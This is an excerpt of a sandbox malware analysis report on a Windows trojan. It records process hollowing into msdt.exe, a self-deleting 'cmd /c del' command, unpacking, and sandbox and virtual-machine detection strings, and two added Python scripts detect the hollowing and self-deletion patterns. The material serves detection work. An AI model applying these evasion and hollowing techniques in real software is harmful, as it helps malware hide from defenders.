          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F2841F
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F2D5E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FE1D55
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F10D20
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04ADB090
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04AD841F
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B81002
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04ADD5E0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04AC0D20
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04ACF900
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B91D55
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04AE6E30
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04AFEBB0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_0277C343
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_0277B8D6
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_0277B8D3
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_0277C98B
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_02762FB0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_02768C90
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_02768C8B
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_02762D90
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_02762D8C
          Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 04ACB150 appears 35 times
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: String function: 00F1B150 appears 31 times
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_004185F0 NtCreateFile
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_004186A0 NtReadFile
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00418720 NtClose
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_004187D0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_004185EB NtCreateFile
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_0041871A NtClose
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_004187CA NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F598F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F599A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F595D0 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59540 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F596E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F597A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F598A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F5B040 NtSuspendThread
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59820 NtEnumerateKey
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F599D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59950 NtQueueApcThread
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59A10 NtQuerySection
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F5A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59B00 NtSetValueKey
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F595F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59560 NtWriteFile
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F5AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F596D0 NtCreateKey
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B09860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B09840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B099A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B095D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B09910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B09540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B096E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B096D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B09660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B09650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A50 NtCreateFile,LdrInitializeThunk,15_2_04B09A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09780 NtMapViewOfSection,LdrInitializeThunk,15_2_04B09780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09FE0 NtCreateMutant,LdrInitializeThunk,15_2_04B09FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09710 NtQueryInformationToken,LdrInitializeThunk,15_2_04B09710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B098A0 NtWriteVirtualMemory,15_2_04B098A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B098F0 NtReadVirtualMemory,15_2_04B098F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09820 NtEnumerateKey,15_2_04B09820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0B040 NtSuspendThread,15_2_04B0B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B095F0 NtQueryInformationFile,15_2_04B095F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B099D0 NtCreateProcessEx,15_2_04B099D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0AD30 NtSetContextThread,15_2_04B0AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09520 NtWaitForSingleObject,15_2_04B09520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09560 NtWriteFile,15_2_04B09560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09950 NtQueueApcThread,15_2_04B09950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A80 NtOpenDirectoryObject,15_2_04B09A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A20 NtResumeThread,15_2_04B09A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09610 NtEnumerateValueKey,15_2_04B09610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A10 NtQuerySection,15_2_04B09A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A00 NtProtectVirtualMemory,15_2_04B09A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09670 NtQueryInformationProcess,15_2_04B09670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A3B0 NtGetContextThread,15_2_04B0A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B097A0 NtUnmapViewOfSection,15_2_04B097A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09730 NtQueryVirtualMemory,15_2_04B09730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A710 NtOpenProcessToken,15_2_04B0A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09B00 NtSetValueKey,15_2_04B09B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09770 NtSetInformationFile,15_2_04B09770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A770 NtOpenThread,15_2_04B0A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09760 NtOpenProcess,15_2_04B09760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027786A0 NtReadFile,15_2_027786A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02778720 NtClose,15_2_02778720
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027787D0 NtAllocateVirtualMemory,15_2_027787D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027785F0 NtCreateFile,15_2_027785F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277871A NtClose,15_2_0277871A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027787CA NtAllocateVirtualMemory,15_2_027787CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027785EB NtCreateFile,15_2_027785EB
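Added analyst example (not part of the Joe Sandbox report and not code from the sample): the native calls resolved by process 5 (divpCHa0h7.exe) and process 15 (msdt.exe) above are the complete toolkit for process hollowing: create a target (NtCreateProcessEx), carve out its image (NtUnmapViewOfSection), place the payload (NtMapViewOfSection / NtWriteVirtualMemory), hijack its thread (NtSetContextThread) and run it (NtResumeThread / NtQueueApcThread). The script parses lines in the format of the table above and scores each process against that five-stage grouping. The grouping itself, the four-of-five threshold and the control process (notepad.exe, proc 9) are my assumptions, not report content.

```python
import re
from collections import defaultdict

# Entries copied from the Nt* resolution table above (spacing restored), plus a
# constructed control process (proc 9, notepad.exe) that is NOT in the report.
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59A20 NtResumeThread,LdrInitializeThunk,5_2_00F59A20
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F597A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_00F597A0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59780 NtMapViewOfSection,LdrInitializeThunk,5_2_00F59780
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F598A0 NtWriteVirtualMemory,5_2_00F598A0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F599D0 NtCreateProcessEx,5_2_00F599D0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F59950 NtQueueApcThread,5_2_00F59950
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F5AD30 NtSetContextThread,5_2_00F5AD30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B099A0 NtCreateSection,LdrInitializeThunk,15_2_04B099A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B09780 NtMapViewOfSection,LdrInitializeThunk,15_2_04B09780
Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B099D0 NtCreateProcessEx,15_2_04B099D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B0AD30 NtSetContextThread,15_2_04B0AD30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B09950 NtQueueApcThread,15_2_04B09950
Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B097A0 NtUnmapViewOfSection,15_2_04B097A0
Source: C:\Windows\System32\notepad.exe Code function: 9_2_00401000 NtClose,9_2_00401000
Source: C:\Windows\System32\notepad.exe Code function: 9_2_00401040 NtReadFile,9_2_00401040
"""

LINE_RE = re.compile(
    r"Source:\s*(?P<image>.+?)\s*Code function:\s*"
    r"(?P<proc>\d+)_\d+_(?P<addr>[0-9A-Fa-f]{8})\s+(?P<apis>\S+)"
)

# One heuristic mapping of Nt* calls to the stages of process hollowing
# (an analyst's grouping, not something the report itself defines).
HOLLOWING_STAGES = {
    "create_target": {"NtCreateProcessEx", "NtCreateProcess", "NtCreateUserProcess"},
    "carve_out":     {"NtUnmapViewOfSection"},
    "write_payload": {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "hijack_thread": {"NtSetContextThread", "NtGetContextThread"},
    "run_payload":   {"NtResumeThread", "NtQueueApcThread"},
}

def parse_report(text):
    """Collect the Nt*/Zw* names each sandbox process resolves, keyed by proc id."""
    by_proc = defaultdict(lambda: {"image": None, "apis": set()})
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        entry = by_proc[m["proc"]]
        entry["image"] = m["image"]
        # The apis field is "Name1,Name2,<function id>"; keep only native calls.
        entry["apis"].update(t for t in m["apis"].split(",") if t.startswith(("Nt", "Zw")))
    return dict(by_proc)

def hollowing_stages(apis):
    """Return {stage: [matching apis]} for every stage the process can perform."""
    return {stage: sorted(apis & names)
            for stage, names in HOLLOWING_STAGES.items() if apis & names}

def assess(text, min_stages=4):
    """Flag a process when it resolves calls for at least min_stages of the
    five stages; the threshold is a tunable assumption, not a report value."""
    findings = {}
    for proc, entry in parse_report(text).items():
        stages = hollowing_stages(entry["apis"])
        findings[proc] = {"image": entry["image"], "stages": stages,
                          "suspicious": len(stages) >= min_stages}
    return findings

if __name__ == "__main__":
    for proc, f in sorted(assess(REPORT_LINES).items(), key=lambda kv: int(kv[0])):
        flag = "HOLLOWING?" if f["suspicious"] else "ok"
        print(f"proc {proc:>2} {f['image']:<45} {flag:<10} {', '.join(f['stages'])}")
```

Resolving these calls is necessary but not sufficient evidence: the sandbox's own "Sample uses process hollowing technique" verdict (see the signature list at the top) comes from observing the sequence at run time, whereas this check only confirms that the capability is wired up in both the original sample and the hollowed msdt.exe, which is what makes msdt.exe's later injection into explorer.exe possible.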
Source: divpCHa0h7.exe Binary or memory string: OriginalFilename vs divpCHa0h7.exe
Source: divpCHa0h7.exe, 00000001.00000000.243614905.0000000000692000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
Source: divpCHa0h7.exe, 00000001.00000002.271111819.00000000071F0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameUI.dll< vs divpCHa0h7.exe
Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs divpCHa0h7.exe
Source: divpCHa0h7.exe Binary or memory string: OriginalFilename vs divpCHa0h7.exe
Source: divpCHa0h7.exe, 00000003.00000000.261988052.0000000000142000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
Source: divpCHa0h7.exe Binary or memory string: OriginalFilename vs divpCHa0h7.exe
Source: divpCHa0h7.exe, 00000004.00000000.263958502.00000000003A2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
Source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamemsdt.exej% vs divpCHa0h7.exe
Source: divpCHa0h7.exe, 00000005.00000000.264881846.0000000000402000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
Source: divpCHa0h7.exe, 00000005.00000002.363189581.000000000100F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs divpCHa0h7.exe
Source: divpCHa0h7.exe Binary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
Source: divpCHa0h7.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: divpCHa0h7.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: divpCHa0h7.exe Virustotal: Detection: 16%
Source: divpCHa0h7.exe ReversingLabs: Detection: 17%
Source: divpCHa0h7.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\divpCHa0h7.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\divpCHa0h7.exe 'C:\Users\user\Desktop\divpCHa0h7.exe'
Source: C:\Users\user\Desktop\divpCHa0h7.exe Process created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
Source: C:\Users\user\Desktop\divpCHa0h7.exe Process created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
Source: C:\Users\user\Desktop\divpCHa0h7.exe Process created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
Source: C:\Users\user\Desktop\divpCHa0h7.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\divpCHa0h7.exe File created: C:\Users\user\AppData\Local\Gottschalks
Source: classification engine Classification label: mal100.troj.evad.winEXE@12/1@8/5
Source: C:\Users\user\Desktop\divpCHa0h7.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\divpCHa0h7.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: divpCHa0h7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: divpCHa0h7.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msdt.pdbGCTL source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: divpCHa0h7.exe, 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, msdt.exe, 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: divpCHa0h7.exe, msdt.exe
Source: Binary string: msdt.pdb source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\divpCHa0h7.exe Unpacked PE file: 5.2.divpCHa0h7.exe.400000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs .text:ER;
.NET source code contains potential unpacker
Source: divpCHa0h7.exe, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 1.0.divpCHa0h7.exe.690000.0.unpack, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 1.2.divpCHa0h7.exe.690000.0.unpack, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.divpCHa0h7.exe.140000.0.unpack, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.divpCHa0h7.exe.140000.0.unpack, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.divpCHa0h7.exe.3a0000.0.unpack, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.divpCHa0h7.exe.3a0000.0.unpack, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.divpCHa0h7.exe.400000.0.unpack, MapEditor1/CreateMapDialog.cs .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 1_2_006971C7 push 00000014h; iretd 1_2_006973C0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 1_2_0106203B push ebx; retf 1_2_0106207A
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 3_2_001471C7 push 00000014h; iretd 3_2_001473C0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 4_2_003A71C7 push 00000014h; iretd 4_2_003A73C0
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_0041B832 push eax; ret 5_2_0041B838
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F6D0D1 push ecx; ret 5_2_00F6D0E4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_04B1D0D1 push ecx; ret 15_2_04B1D0E4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_0277B832 push eax; ret 15_2_0277B838
Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_0277B83B push eax; ret 15_2_0277B8A2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_0277B89C push eax; ret 15_2_0277B8A2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 15_2_0277B7E5 push eax; ret 15_2_0277B838
Source: initial sample Static PE information: section name: .text entropy: 7.77424395601

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\msdt.exe Process created: /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
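Added analyst example covering both the process tree listed earlier in this report and the self-deletion signature above; it is not part of the Joe Sandbox report and not code from the sample. It parses "Process created" lines in the report's format, rebuilds a parent/child map keyed by image path, and flags three things: the sample re-launching its own image, an argument-less system binary (msdt.exe here) started from a user-profile path, and a cmd /c del whose target is an ancestor of the cmd.exe process. The three rule names, the system-directory list and the quoting accepted by the del parser are my assumptions.

```python
import re
from collections import Counter, defaultdict

# "Process created" entries copied from the report above (spacing restored).
REPORT_EVENTS = r"""
Source: unknown Process created: C:\Users\user\Desktop\divpCHa0h7.exe 'C:\Users\user\Desktop\divpCHa0h7.exe'
Source: C:\Users\user\Desktop\divpCHa0h7.exe Process created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
Source: C:\Users\user\Desktop\divpCHa0h7.exe Process created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
Source: C:\Users\user\Desktop\divpCHa0h7.exe Process created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
Source: C:\Users\user\Desktop\divpCHa0h7.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
"""

EVENT_RE = re.compile(r"Source:\s*(?P<parent>.+?)\s*Process created:\s*(?P<child>\S+)\s*(?P<cmdline>.*)$")
# cmd.exe "/c del|erase [switches] <path>", path optionally wrapped in ' or "
DEL_RE = re.compile(r"""^\s*/c\s+(?:del|erase)\s+(?:/\S+\s+)*['"]?(?P<target>[^'"]+?)['"]?\s*$""", re.I)
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")   # assumption

def parse_events(text):
    """(parent image, child image, child command line) per report line."""
    out = []
    for line in text.splitlines():
        m = EVENT_RE.search(line)
        if m:
            out.append((m["parent"], m["child"], m["cmdline"].strip()))
    return out

def ancestors(image, parent_of):
    """Every image above `image` in the tree (cycle-safe: the sample spawns itself)."""
    seen, todo = set(), [image]
    while todo:
        for p in parent_of.get(todo.pop(), ()):
            if p not in seen:
                seen.add(p)
                todo.append(p)
    return seen

def analyse(text):
    events = parse_events(text)
    parent_of = defaultdict(set)
    for parent, child, _ in events:
        parent_of[child].add(parent)
    findings = []
    # 1. A binary re-launching its own image (the report shows three hops).
    for image, n in Counter(c for p, c, _ in events if p.lower() == c.lower()).items():
        findings.append(("self_reexec", image, f"{n}x"))
    for parent, child, cmdline in events:
        lc = child.lower()
        # 2. Argument-less system binary started from a user-profile path: the
        #    usual shape of a hollowing target (msdt.exe in this report).
        if any(d in lc for d in SYSTEM_DIRS) and "\\users\\" in parent.lower() \
                and cmdline.lower() in ("", lc):
            findings.append(("system_binary_from_user_path", child, parent))
        # 3. cmd /c del whose target is an ancestor of the cmd.exe process.
        m = DEL_RE.match(cmdline) if lc.endswith("\\cmd.exe") else None
        if m:
            target = m["target"].strip()
            if target.lower() in {a.lower() for a in ancestors(child, parent_of)}:
                findings.append(("self_delete", target, parent))
    return findings

if __name__ == "__main__":
    for kind, subject, detail in analyse(REPORT_EVENTS):
        print(f"{kind:<30} {subject}  <- {detail}")
```

The ancestor walk matters for rule 3: the deleting cmd.exe is two hops away from the file it removes (sample -> msdt.exe -> cmd.exe), so a rule that only compares cmd.exe's direct parent with the del target would miss this case. On a live host the same logic runs over Sysmon event 1 or the Security 4688 log, where ParentImage/ParentCommandLine give the same fields.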
Source: C:\Users\user\Desktop\divpCHa0h7.exe Process information set: NOOPENFILEERRORBOX (37 identical entries)
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 1.2.divpCHa0h7.exe.2b01658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: divpCHa0h7.exe PID: 3240, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
